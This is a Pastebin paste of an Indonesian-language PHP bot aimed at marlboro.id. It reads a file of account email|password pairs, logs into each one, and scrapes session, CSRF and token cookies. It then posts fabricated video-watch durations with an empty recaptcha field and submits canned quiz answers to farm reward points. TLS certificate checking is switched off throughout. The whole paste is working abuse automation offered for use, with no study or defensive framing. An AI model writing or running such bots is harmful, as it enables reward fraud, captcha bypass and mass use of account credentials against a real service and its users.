SHARE
TWEET

Untitled

a guest Nov 8th, 2019 72 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. echo "BOT KLAIM 10K & NONTON 5 PASSION\n";
  3. echo "Input FIle Akun Marlboro (Email|Pass) : ";
  4. $fileakun = trim(fgets(STDIN));
  5. print PHP_EOL."Total Ada : ".count(explode("\n", str_replace("\r","",@file_get_contents($fileakun))))." Akun, Letsgo..\n";
  6. foreach(explode("\n", str_replace("\r", "", @file_get_contents($fileakun))) as $c => $akun)
  7.     {
  8. $pecah = explode("|", trim($akun));
  9.         $email = trim($pecah[0]);
  10.         $password = trim($pecah[1]);
  11. $cookie=cookie();
  12. echo "Eksekusi Passion $email  ";
  13. $login=login($cookie['device_id'],$cookie['session'],$cookie['csrf'],urlencode($email),$password);
  14. if(strpos($login['response'], '"message":"success"') !== false){
  15.     $get_token=get_token($cookie['device_id'],$login['session']);
  16.     echo "(".get_between($get_token['response'],'"point">','</div>').") = ";
  17.     $get_link=passion('https://www.marlboro.id/discovered/passion-land/',$cookie['device_id'],$get_token['token'],$get_token['r_token'],$get_token['session'],$login['mm3rm4bre']);
  18.     preg_match_all('#\bhttps://www.marlboro.id/discovered/article/[^,\s()<>]+(?:\([\w\d]+\)|([^,[:punct:]\s]|/))#', $get_link['response'], $grab);
  19.     $link = array(array_unique($grab[0]));
  20.     for($i=0;$i<7;$i++){
  21.     //$get_token=get_token($cookie['device_id'],$login['session']);
  22.     $k = array_rand($link[0]);
  23.     $id=substr($link[0][$k], strrpos($link[0][$k], '/' )+1);
  24.     $passion=passion('https://www.marlboro.id/discovered/article/'.$id,$cookie['device_id'],$get_token['token'],$get_token['r_token'],$get_token['session'],$login['mm3rm4bre']);
  25.     $nonton=nonton('https://www.marlboro.id/article/video-play/'.$id,$cookie['device_id'],$get_token['token'],$get_token['r_token'],$passion['session'],$login['mm3rm4bre'],$id,$passion['csrf']);
  26.     $update=update('https://www.marlboro.id/article/video-play/'.$id,$cookie['device_id'],$get_token['token'],$get_token['r_token'],$nonton['session'],$login['mm3rm4bre'],$id,$passion['csrf'],$nonton['logid']);
  27.     }
  28.     echo "Sukses Menonton 5 Video|";
  29.     $get_token=get_token($cookie['device_id'],$login['session']);
  30.     $cookie_kuis1=cookie_kuis('https://www.marlboro.id/discovered/passion-quiz-start',$cookie['device_id'],$get_token['token'],$get_token['r_token'],$get_token['session'],$login['mm3rm4bre']);
  31.     $cookie_kuis2=cookie_kuis('https://www.marlboro.id/discovered/passion-quiz/question-1',$cookie['device_id'],$get_token['token'],$get_token['r_token'],$cookie_kuis1['session'],$login['mm3rm4bre']);
  32.     $cookie_kuis3=cookie_kuis('https://www.marlboro.id/discovered/passion-quiz/question-2',$cookie['device_id'],$get_token['token'],$get_token['r_token'],$cookie_kuis2['session'],$login['mm3rm4bre']);
  33.     $cookie_kuis4=cookie_kuis('https://www.marlboro.id/discovered/passion-quiz/question-3',$cookie['device_id'],$get_token['token'],$get_token['r_token'],$cookie_kuis3['session'],$login['mm3rm4bre']);
  34.     $kuis=kuis($cookie['device_id'],$get_token['token'],$get_token['r_token'],$cookie_kuis4['session'],$login['mm3rm4bre'],$cookie_kuis4['csrf']);
  35.     $result=cookie_kuis('https://www.marlboro.id/discovered/passion-quiz-result/hustler',$cookie['device_id'],$get_token['token'],$get_token['r_token'],$kuis['session'],$login['mm3rm4bre']);
  36.     $get_point=get_token($cookie['device_id'],$result['session']);
  37.     if($kuis['status']=='success'){
  38.     echo "Sukses Quiz (".get_between($get_point['response'],'"point">','</div>').")\n";
  39.    
  40.     }
  41.     else{
  42.         echo "Gagal Quiz (".get_between($get_point['response'],'"point">','</div>').")\n";
  43.     }
  44.     }
  45. else{
  46.     echo " = Gagal Login\n";
  47.     }}
  48. function cookie(){
  49. $c = curl_init("https://www.marlboro.id/auth/login");
  50.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  51.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
  52.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  53.     curl_setopt($c, CURLOPT_MAXREDIRS, 15);
  54.     curl_setopt($c, CURLOPT_TIMEOUT, 30);
  55.     curl_setopt($c, CURLOPT_ENCODING, "");
  56.     curl_setopt($c, CURLOPT_CUSTOMREQUEST, "GET");
  57.     curl_setopt($c, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
  58.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  59.     curl_setopt($c, CURLOPT_HEADER, true);
  60.     $response = curl_exec($c);
  61.     $csrf=get_between($response, 'decide_csrf" value="', '" /><input');
  62.     $session=get_between($response, 'Set-Cookie: decide_session=', '; path=/;');
  63.     $deviceid=get_between($response, 'Set-Cookie: deviceId=', '; Max-Age=');
  64.     return array(
  65.         'csrf' => $csrf,
  66.         'session' => $session,
  67.         'device_id' => $deviceid
  68.     );
  69. }
  70. function login($device_id,$session,$csrf,$email,$password){
  71. $header = array();
  72. $header[] = "Host: www.marlboro.id";
  73. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0";
  74. $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  75. $header[] = "Accept-Language: en-US,en;q=0.5";
  76. $header[] = "Accept: application/json";
  77. $header[] = "Accept-Encoding: gzip, deflate, br";
  78. $header[] = "DNT: 1";    
  79. $header[] = "Connection: keep-alive";
  80. $header[] = "Upgrade-Insecure-Requests: 1";
  81. $header[] = 'Cookie: scs=1; deviceId='.$device_id.'; decide_session='.$session;
  82. $c = curl_init("https://www.marlboro.id/auth/login");
  83.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  84.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);;
  85.     curl_setopt($c, CURLOPT_POSTFIELDS, 'email='.$email.'&password='.$password.'&remember_me=remember_me&ref_uri=/&decide_csrf='.$csrf.'&param=&exception_redirect=false');
  86.     curl_setopt($c, CURLOPT_POST, true);
  87.     curl_setopt($c, CURLOPT_ENCODING, "");
  88.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  89.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  90.     curl_setopt($c, CURLOPT_HEADER, true);
  91.     curl_setopt($c, CURLOPT_HTTPHEADER, $header);
  92.     $response = curl_exec($c);
  93.     $session2=get_between($response, 'Set-Cookie: decide_session=', '; path=/;');
  94.     $mm3rm4bre=get_between($response, '_mm3rm4bre_=', ';');
  95.     return array(
  96.         'session' => $session2,
  97.         'mm3rm4bre' => $mm3rm4bre,
  98.         'response' => $response
  99.     );
  100. }
  101. function get_token($device_id,$session){
  102.     $header = array();
  103. $header[] = "Host: www.marlboro.id";
  104. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0";
  105. $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  106. $header[] = "Accept-Language: en-US,en;q=0.5";
  107. $header[] = "Accept: application/json";
  108. $header[] = "Accept-Encoding: gzip, deflate, br";
  109. $header[] = "DNT: 1";    
  110. $header[] = "Connection: keep-alive";
  111. $header[] = "Upgrade-Insecure-Requests: 1";
  112. $header[] = 'Cookie: deviceId='.$device_id.'; decide_session='.$session.'; _p1K4r_=true; pikar_redirect=true';
  113. $c = curl_init("https://www.marlboro.id");
  114.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  115.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
  116.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  117.     curl_setopt($c, CURLOPT_MAXREDIRS, 15);
  118.     curl_setopt($c, CURLOPT_TIMEOUT, 30);
  119.     curl_setopt($c, CURLOPT_ENCODING, "");
  120.     curl_setopt($c, CURLOPT_CUSTOMREQUEST, "GET");
  121.     curl_setopt($c, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
  122.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  123.     curl_setopt($c, CURLOPT_HEADER, true);
  124.     curl_setopt($c, CURLOPT_HTTPHEADER, $header);
  125.     $response = curl_exec($c);
  126.     $token=get_between($response,' token=',';');
  127.     $r_token=get_between($response,' refresh_token=',';');
  128.     $session2=get_between($response, 'Set-Cookie: decide_session=', '; path=/;');
  129.     $point=get_between($response,'<div class="point">','</div>');
  130.     return array(
  131.         'token' => $token,
  132.         'r_token' => $r_token,
  133.         'session' => $session2,
  134.         'point' => $point,
  135.         'response' => $response
  136.     );
  137.    
  138. }
  139. function passion($url,$deviceId,$token,$refresh_token,$decide_session,$mm3rm4bre){
  140.     $header = array();
  141. $header[] = "Host: www.marlboro.id";
  142. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0";
  143. $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  144. $header[] = "Accept-Language: en-US,en;q=0.5";
  145. $header[] = "Accept: application/json";
  146. $header[] = "Accept-Encoding: gzip, deflate, br";
  147. $header[] = "DNT: 1";    
  148. $header[] = "Connection: keep-alive";
  149. $header[] = "Upgrade-Insecure-Requests: 1";
  150. $header[] = 'Cookie: deviceId='.$deviceId.'; token='.$token.'; refresh_token='.$refresh_token.'; decide_session='.$decide_session.'; insdrSV=4; scs=1; ins-gaSSId=6804cbff-54af-eb6a-5ac3-b56dd82ee3ba_1573243776; _p1K4r_=true; pikar_redirect=true; _gcl_au=1.1.698372179.1573243784; _mm3rm4bre_='.$mm3rm4bre.'; ev=1';
  151. $c = curl_init($url);
  152.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  153.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
  154.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  155.     curl_setopt($c, CURLOPT_MAXREDIRS, 15);
  156.     curl_setopt($c, CURLOPT_TIMEOUT, 30);
  157.     curl_setopt($c, CURLOPT_ENCODING, "");
  158.     curl_setopt($c, CURLOPT_CUSTOMREQUEST, "GET");
  159.     curl_setopt($c, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
  160.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  161.     curl_setopt($c, CURLOPT_HEADER, true);
  162.     curl_setopt($c, CURLOPT_HTTPHEADER, $header);
  163.     $response = curl_exec($c);
  164.     $session=get_between($response, 'Set-Cookie: decide_session=', '; path=/;');
  165.     $csrf=get_between($response, 'decide_csrf" value="', '" /><input');
  166.     return array(
  167.         'session' => $session,
  168.         'response' => $response,
  169.         'csrf' => $csrf
  170.     );
  171.    
  172. }
  173. function nonton($url,$deviceId,$token,$refresh_token,$decide_session,$mm3rm4bre,$id,$decide_csrf){
  174. $header = array();
  175. $header[] = "Host: www.marlboro.id";
  176. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0";
  177. $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  178. $header[] = "Accept-Language: en-US,en;q=0.5";
  179. $header[] = "Accept: application/json";
  180. $header[] = "Accept-Encoding: gzip, deflate, br";
  181. $header[] = "DNT: 1";    
  182. $header[] = "Connection: keep-alive";
  183. $header[] = "Upgrade-Insecure-Requests: 1";
  184. $header[] = 'Cookie: deviceId='.$deviceId.'; token='.$token.'; refresh_token='.$refresh_token.'; decide_session='.$decide_session.'; insdrSV=4; scs=1; ins-gaSSId=6804cbff-54af-eb6a-5ac3-b56dd82ee3ba_1573243776; _p1K4r_=true; pikar_redirect=true; _gcl_au=1.1.698372179.1573243784; _mm3rm4bre_='.$mm3rm4bre.'; ev=1; ins-product-id='.$id.'; current-currency=IDR';
  185. $c = curl_init($url);
  186.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  187.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);;
  188.     curl_setopt($c, CURLOPT_POSTFIELDS, 'decide_csrf='.$decide_csrf.'&log_id=false&duration=0.036&total_duration=67.370666&fetch=1&g-recaptcha-response=');
  189.     curl_setopt($c, CURLOPT_POST, true);
  190.     curl_setopt($c, CURLOPT_ENCODING, "");
  191.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  192.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  193.     curl_setopt($c, CURLOPT_HEADER, true);
  194.     curl_setopt($c, CURLOPT_HTTPHEADER, $header);
  195.     $response = curl_exec($c);
  196.     $session=get_between($response, 'Set-Cookie: decide_session=', '; path=/;');
  197.     $logid=get_between($response, '"log_id":"', '"');
  198.     return array(
  199.         'session' => $session,
  200.         'logid' => $logid
  201.     );
  202. }
  203. function update($url,$deviceId,$token,$refresh_token,$decide_session,$mm3rm4bre,$id,$decide_csrf,$logid){
  204. $header = array();
  205. $header[] = "Host: www.marlboro.id";
  206. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0";
  207. $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  208. $header[] = "Accept-Language: en-US,en;q=0.5";
  209. $header[] = "Accept: application/json";
  210. $header[] = "Accept-Encoding: gzip, deflate, br";
  211. $header[] = "DNT: 1";    
  212. $header[] = "Connection: keep-alive";
  213. $header[] = "Upgrade-Insecure-Requests: 1";
  214. $header[] = 'Cookie: deviceId='.$deviceId.'; token='.$token.'; refresh_token='.$refresh_token.'; decide_session='.$decide_session.'; insdrSV=4; scs=1; ins-gaSSId=6804cbff-54af-eb6a-5ac3-b56dd82ee3ba_1573243776; _p1K4r_=true; pikar_redirect=true; _gcl_au=1.1.698372179.1573243784; _mm3rm4bre_='.$mm3rm4bre.'; ev=1; ins-product-id='.$id.'; current-currency=IDR';
  215. $c = curl_init($url);
  216.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  217.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);;
  218.     curl_setopt($c, CURLOPT_POSTFIELDS, 'decide_csrf='.$decide_csrf.'&log_id='.$logid.'&duration=67.738&total_duration=67.370666&fetch=1&g-recaptcha-response=');
  219.     curl_setopt($c, CURLOPT_POST, true);
  220.     curl_setopt($c, CURLOPT_ENCODING, "");
  221.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  222.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  223.     curl_setopt($c, CURLOPT_HEADER, true);
  224.     curl_setopt($c, CURLOPT_HTTPHEADER, $header);
  225.     $response = curl_exec($c);
  226.     return $response;
  227. }
  228. function cookie_kuis($url,$deviceId,$token,$refresh_token,$decide_session,$mm3rm4bre){
  229.     $header = array();
  230. $header[] = "Host: www.marlboro.id";
  231. $header[] = "User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36";
  232. $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  233. $header[] = "Accept-Language: en-US,en;q=0.5";
  234. $header[] = "Accept: application/json";
  235. $header[] = "Accept-Encoding: gzip, deflate, br";
  236. $header[] = "DNT: 1";    
  237. $header[] = "Connection: keep-alive";
  238. $header[] = "Upgrade-Insecure-Requests: 1";
  239. $header[] = 'Cookie: scs=1; scs=1; deviceId='.$deviceId.'; insdrSV=15; _p1K4r_=true; pikar_redirect=true; ev=1; token='.$token.'; refresh_token='.$refresh_token.'; scs=1; decide_session='.$decide_session.'; _mm3rm4bre_='.$mm3rm4bre;
  240. $c = curl_init($url);
  241.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  242.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
  243.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  244.     curl_setopt($c, CURLOPT_MAXREDIRS, 15);
  245.     curl_setopt($c, CURLOPT_TIMEOUT, 30);
  246.     curl_setopt($c, CURLOPT_ENCODING, "");
  247.     curl_setopt($c, CURLOPT_CUSTOMREQUEST, "GET");
  248.     curl_setopt($c, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
  249.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  250.     curl_setopt($c, CURLOPT_HEADER, true);
  251.     curl_setopt($c, CURLOPT_HTTPHEADER, $header);
  252.     $response = curl_exec($c);
  253.     $session=get_between($response, 'Set-Cookie: decide_session=', '; path=/;');
  254.     $csrf=get_between($response, 'decide_csrf" value="', '" /><input');
  255.     return array(
  256.         'session' => $session,
  257.         'response' => $response,
  258.         'csrf' => $csrf
  259.     );
  260. }
  261. function kuis($deviceId,$token,$refresh_token,$decide_session,$mm3rm4bre,$csrf){
  262. $header = array();
  263. $header[] = "Host: www.marlboro.id";
  264. $header[] = "User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36";
  265. $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  266. $header[] = "Accept-Language: en-US,en;q=0.5";
  267. $header[] = "Accept: application/json";
  268. $header[] = "Accept-Encoding: gzip, deflate, br";
  269. $header[] = "DNT: 1";    
  270. $header[] = "Connection: keep-alive";
  271. $header[] = "Referer: https://www.marlboro.id/discovered/passion-quiz/question-3";  
  272. $header[] = "Upgrade-Insecure-Requests: 1";
  273. $header[] = 'Cookie: scs=1;scs=1; deviceId='.$deviceId.'; token='.$token.'; refresh_token='.$refresh_token.'; scs=1; decide_session='.$decide_session.';insdrSV=7; scs=1; ins-gaSSId=38a1c03b-e7e0-3d95-ec0b-c1dbab747abe_1573249589; _p1K4r_=true; pikar_redirect=true; _gcl_au=1.1.878906618.1573249592; _mm3rm4bre_='.$mm3rm4bre.'; ev=1';
  274. $c = curl_init("https://www.marlboro.id/discovered/passion-quiz-insert");
  275.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
  276.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);;
  277.     curl_setopt($c, CURLOPT_POSTFIELDS, 'answer=3&decide_csrf='.$csrf);
  278.     curl_setopt($c, CURLOPT_POST, true);
  279.     curl_setopt($c, CURLOPT_ENCODING, "");
  280.     curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);
  281.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  282.     curl_setopt($c, CURLOPT_HEADER, true);
  283.     curl_setopt($c, CURLOPT_HTTPHEADER, $header);
  284.     $response = curl_exec($c);
  285.     $session=get_between($response, 'Set-Cookie: decide_session=', '; path=/;');
  286.     $status=get_between($response,'"message":"','","');
  287.      return array(
  288.         'status' => $status,
  289.         'session' => $session
  290.     );
  291. }
  292. function get_between($string, $start, $end)
  293.     {
  294.         $string = " ".$string;
  295.         $ini = strpos($string,$start);
  296.         if ($ini == 0) return "";
  297.         $ini += strlen($start);
  298.         $len = strpos($string,$end,$ini) - $ini;
  299.         return substr($string,$ini,$len);
  300.     }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top